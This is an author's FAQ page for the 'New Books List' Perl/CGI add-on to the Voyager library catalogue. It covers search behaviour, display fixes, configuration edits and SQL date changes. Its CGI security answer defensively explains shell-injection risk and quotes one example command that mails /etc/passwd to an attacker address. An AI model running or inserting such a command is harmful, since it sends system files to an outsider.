Michael Doran Home Page
Contact | Site Map | Search  
  Home > New Books List > About > FAQ

New Books List

Frequently Asked Questions




How does the keyword searching work?
The keyword searching facility has not previously been documented 
and there are a few wrinkles to how searches are handled.  Eventually 
I will distribute a "Help page" that will explain it, but here 
are the basics...

All keyword searches are regular expression matches against:
 1) The title (i.e. the "245" field)
 2) The author
 3) The display call number

However, the search term must be at least two characters long to 
be matched against either the title or author, where a single 
character search term will still be matched against the call number. 
This allows a patron to retrieve all the new items starting with 
(for example) a "Q" or "M" call number without getting a lot of 
false return hits on authors and titles.  Call numbers longer than 
one character are a lot less likely to return false hits against 
titles or authors.

When a user does an "author" search (I have it in quotes because, 
as I've stated above, every search over 1 character gets matched 
against all three things) they should get a hit either by searching 
"last_name, first_name" or "first_name last_name".  The search 
will pick up the first syntax by matching against the author value 
and the second syntax because it is also matching against author 
information in the 245 field.

Occasionally, a search will return entries that don't seem like 
matches to the search term.  This is because the full 245 field is 
no longer displayed in the results, as it was in version 2.0.  (For 
display, it is now truncated at the "/" character.)  So if a search 
term matches (for example) on an illustrator's name in the 245 
field, it will be retrieved, but that name won't appear in the 
author column of the results page.  (Clicking on the link to the 
actual WebVoyage record will solve those mysteries.)

The keyword search function was a little added bonus that I didn't 
want to clutter up with a lot of user options.  I tried to program 
it so that a search would return what the user would intuitively 
expect it to, regardless of what they plug in as a search term.  
I've not done usability testing to determine if I was successful, 
but I'm very interested in feedback from the trenches.

Update: Version 4.0 now has a configuration option in newbooks.cgi
to allow for full display of the 245 field, if desired. 
Top


Record titles and locations are centered rather than left-justified when viewed with the Internet Explorer 6.0 browser. How can this be fixed?
Internet Explorer 6.0 centers the content in table cells if the table 
is placed within a div element that has the align attibute set
to "center."  The HTML code of newbooks.cgi has been tweaked so that
pages look OK.  The current 4.0 download tarball has the fix.  (This 
only affected newbooks.cgi; the newbooks.pl program was not changed.) 
Top


We're still running Voyager 99.1. Can we use version 3.x of the New Books List?
Yes, with a little tweaking. The newbooks.cgi creates links back to 
WebVoyage for each item. These "canned search" links work in 2000.1 
but won't work in 99.1 until you adjust that part of the code. 
(Endeavor changed the search query syntax between 99.1 and 2000.1.)  

Example of code used in New Books List 2.0 (for Voyager 99.1):
/cgi-bin/Pwebrecon.cgi?DB=local&SA1=$isbn_only&BOOL1=as+a+phrase
&FLD1=ISBN+%28ISBN%29&CNT=50+records+per+page

Example of code used in New Books List 3.x (for Voyager 2000.1):
/cgi-bin/Pwebrecon.cgi?DB=local&Search_Arg=ISBN+%22$isbn_only%22
&SL=None&Search_Code=CMD&CNT=10

Also, the new books list search form as generated by the newbooks.cgi 
program has been designed to mimic the Voyager 2000.1 look.  If you 
find this to be an aesthetic problem, the newbooks.cgi program 
provides a way of disabling the default search form so that you can 
create your own.
Top


How can I add a "New Books" tab to all the WebVoyage search screens?
Adding tabs to all the search screens can be accomplished by editing
the Tab_Text entry in the Course_Reserve_Search_Page stanza of the
/m1/voyager/xxxdb/etc/webvoyage/local/opac.ini file.
  Replace this:
	Tab_Text=Course Reserves
  With this:
        Tab_Text=Course Reserves</a> &nbsp; </font>&nbsp;
        </th></tr></table></td><td>&nbsp;&nbsp;</td>
        <td><table border="0" cellspacing="0" cellpadding="0">
        <tr><th nowrap bgcolor="#003f7c">&nbsp;<font
        color="#fcf7ea">&nbsp; <a style="color:#fcf7ea"
        href="/cgi-bin/newbooks.cgi">New Books</a>
Note: There shouldn't be any line breaks.  You will have to adjust 
font, background, and style colors to match your site's scheme.

Credit: This solution comes courtesy of Alan Keely.  Thanks Alan! 
Top


Can we make the "In Process" message go away, or change it to something else?
I think all you have to do is edit a couple of lines down in the 
guts of the newbooks.pl program.

Try replacing occurances of these lines
	else { print OUTFILE " In Process\t"; }
with this
	else { print OUTFILE " &nbsp;\t"; }

The no-break-space character (&nbsp;) will not display, but will 
be a placeholder in the cell element of the table when items are 
displayed.

Also  make sure that $in_process_page = "no" in newbooks.cgi.

I *think* this should do the job without having any unwanted 
side effects, but haven't tested it.
Top


We want to change the date range to monthly, going back 6 months... It looks like the newbooks.pl and newbooks.cgi will both need some modifications.
Yes, that can be done and you are right that both programs will 
need modification.  The University of Rochester has done just that.
(see: http://groucho.lib.rochester.edu/cgi-bin/newbooks.cgi)

I definitely encourage people to modify the programs to suit the 
needs of their institutions.  As I make enhancements myself, I also 
try to keep in mind that the New Books List is only meant to fill 
a tiny niche.  Do we really want it to do the things that WebVoyage 
does much better?  Library staff, rather than patrons, are often 
the ones that want the longer time periods (as an aid to gathering 
statistics).  Data like that are probably better obtained via 
alternate Voyager reporting options.

Update: I have acceded to numerous requests for this functionality.
Version 4.0 now offers the option of retreiving either 4 months or 
4 weeks of new items. -mdd
Top


I get a "Can't locate DBI.pm" error message when I try to run newbooks.pl. What's wrong?
Endeavor installs the DBI.pm and DBD.pm Perl module as part of the 
Voyager 2000.1.x or higher upgrades.  It's quite possible that the 
error indicates that Perl is simply looking in the wrong place.  
Try changing the top line of newbooks.pl from this:
	#!/usr/local/bin/perl -w
to this:
	#!/usr/bin/perl -w
That way, it will look for modules in the /usr/lib directory rather 
than the /usr/local/lib directory.  This difference has to do with 
where and how Perl was originally installed on a particular server.

If that doesn't solve the problem, verify that you have the DBI.pm 
module by running this command: 
	find /usr -name DBI.pm  
If that does not locate the module, you may not have it installed.
Top


We have a split server arrangement. We're trying to run newbooks.pl from one of the Voyager application servers rather than the Voyager database server, but I'm getting Oracle connection errors. How can we make it work?
If you are attempting to run newbooks.pl from a server that's NOT the 
Voyager database server, the Oracle connect statement needs to contain 
additional information.

Try changing this line:
    my $dbh = DBI->connect('dbi:Oracle:', $username, $password)
to this:
    my $dbh = DBI->connect('dbi:Oracle:host=host_name;sid=LIBR;
port=1521', $username, $password)

Substitute your Voyager server name for "host_name" in the line above.  
THIS WILL ONLY WORK IF the correct Oracle components and the Perl 
DBI/Oracle DBD modules are already available on the application server.
Top


Why aren't there any government documents in newbooks.txt?
If you choose SQL Option 1 in newbooks.pl, retrieval is based on 
aquisitions line item received, so would not pull any government 
documents because they are not ordered and paid for through acquisitions.  
SQL option 2 is based on bib item add date, so should include 
government documents.

Update: The original SQL options have been superceeded by version
4.0's improved SQL statement, so there is no longer any retrieval
based on aquisitions criteria.  
Top


I'm not sure what to use for location "fragments" in the newbooks.ini program. Can you explain what they do?
Each "fragment" is a subset/part/fragment (chosen by you) of the text 
strings that are extracted from the xxxdb.location.location_display_name 
field of the Voyager database.  The fragment is used to do a Perl 
regular expression match against the full string.  So you simply want to 
select a fragment that will match the intended location(s) and not any 
other locations.  

In UTA's case, for example, "Special" matches all the locations in our 
Special Collections department, but will not match any locations in the 
branches or the areas of the Central Library not included in Special 
Collections.  I could probably have used "Collect" as the fragment 
instead (it needn't be a whole word).

"Special" will regexp match against these locations:
	Special Collections, Floor 6: (Non-circulating)
	Special Collections, Floor 6: Garrett (Non-circulating)
	etc.

"Science" will regexp match against that branch library's locations:
	Science & Engineering Library
	Science & Engineering Library: Reserve
	Science & Engineering Library: Reference

Again, I could just have easily used "Engineering" as the location 
fragment to match all the locations in the Science & Engineering 
Library.
Top


Many of the items in our list have not been cataloged yet. Is there a way of reducing the proportion of "In Process" items?
You might want to consider adjusting the date range for items that 
are extracted.  The default is for a four week window that ranges 
from 1 week ago to 5 weeks ago.  

You could slide that four week window so it covers from 2 weeks ago 
to 6 weeks ago.  With a two week, rather than a one week cushion, 
more items should have made it to the shelves.

To accomplish that you will need to edit newbooks.pl...

change this line:
  (ceil ((sysdate - status_date) / 7) - 1)
to this:
  (ceil ((sysdate - status_date) / 7) - 2)

change this line:
  (status_date between (sysdate - 35) and (sysdate - 7))
to this:
  (status_date between (sysdate - 42) and (sysdate - 14))

change this line:
  (ceil ((sysdate - $db_name.bib_item.add_date) / 7) - 1)
to this:
  (ceil ((sysdate - $db_name.bib_item.add_date) / 7) - 2)

change this line:
  ($db_name.bib_item.add_date between (sysdate - 35) and (sysdate - 7))
to this:
  ($db_name.bib_item.add_date between (sysdate - 42) and (sysdate - 14))

Update: This solution has been incorporated into version 4.0 as the 
"lag time" option.  -mdd
Top


I would like to use the newbook.pl script in such a way that it'll print to STDOUT as follows "./newbooks.pl > newbooks.txt". This is because I'm maintaining two databases and I would like to use the same script for both.
The easiest way to do this, is to assign the value of the $out_file
variable to a parameter that is passed to the script.  Something 
similar to this:

    if (! ($#ARGV == 0)) {
        print "Usage: $0 output_file\n";
        exit(1);
    } else {
        $out_file = shift;
    }

Then you would run it like this: ./newbooks.pl newbooks.txt
Top


My system administrator is concerned about the security of the newbooks.cgi program. Do we have anything to worry about?
Here are some relevant questions to ask regarding CGI scripts...

1) What does the CGI script do with user input?

The most common CGI exploit is when a hacker includes shell meta-
characters in form input as a way of running system commands on 
the web server. If the script itself does not attempt to run any 
system commands using form input, then form data containing shell 
metacharacters is not a concern.  (A common system command used in 
CGI scripts is when the script invokes a Unix mail program.)

If a script *does* use user supplied input (i.e. data included in
the name/value pairs read in from the form) somewhere in a system 
call, then yes, there should be concern.  In newbooks.cgi, the 
ReadParse function checks for shell metacharacters and replaces 
them with spaces.

If only one piece of user input is a potential security problem, 
it is good to subject *it* to closer taint scrutiny.  For example, 
in newbooks.cgi v. 3.x in which mailx is used, the user-supplied 
email address is subjected to this test (which makes sure that 
the input is a proper email address):

    # ...then check for valid characters
    unless ( $mail_address =~ /^\w{1}[\w\-\.]*\@[\w\-\.]+/ ) {
        # if "bad" 
        &MailAck("faulty");
    }

It's generally better to check input for what it *should* be, rather 
than for what it *shouldn't* be.  "What it should be" will always be 
a subset of "what it shouldn't be", and is therefore a more secure 
evaluation.

2) Who is your "httpd" user?

If your Apache web server is properly configured, httpd processes 
are owned by the user "nobody" and therefore CGI programs are 
executed by "nobody."  This means that unless you have world-
writable files and directories, the damage that can be done by a 
malicious user is minimal. 

They may however still be able to run unintended applications and 
read files - the classic example is something along the lines of 
'mailx hacker@blackhat.com < /etc/passwd'.

There is not meant to be a comprehensive overview of CGI security,
it is intended to assure you that I was aware of security issues 
when the programs were written.
Top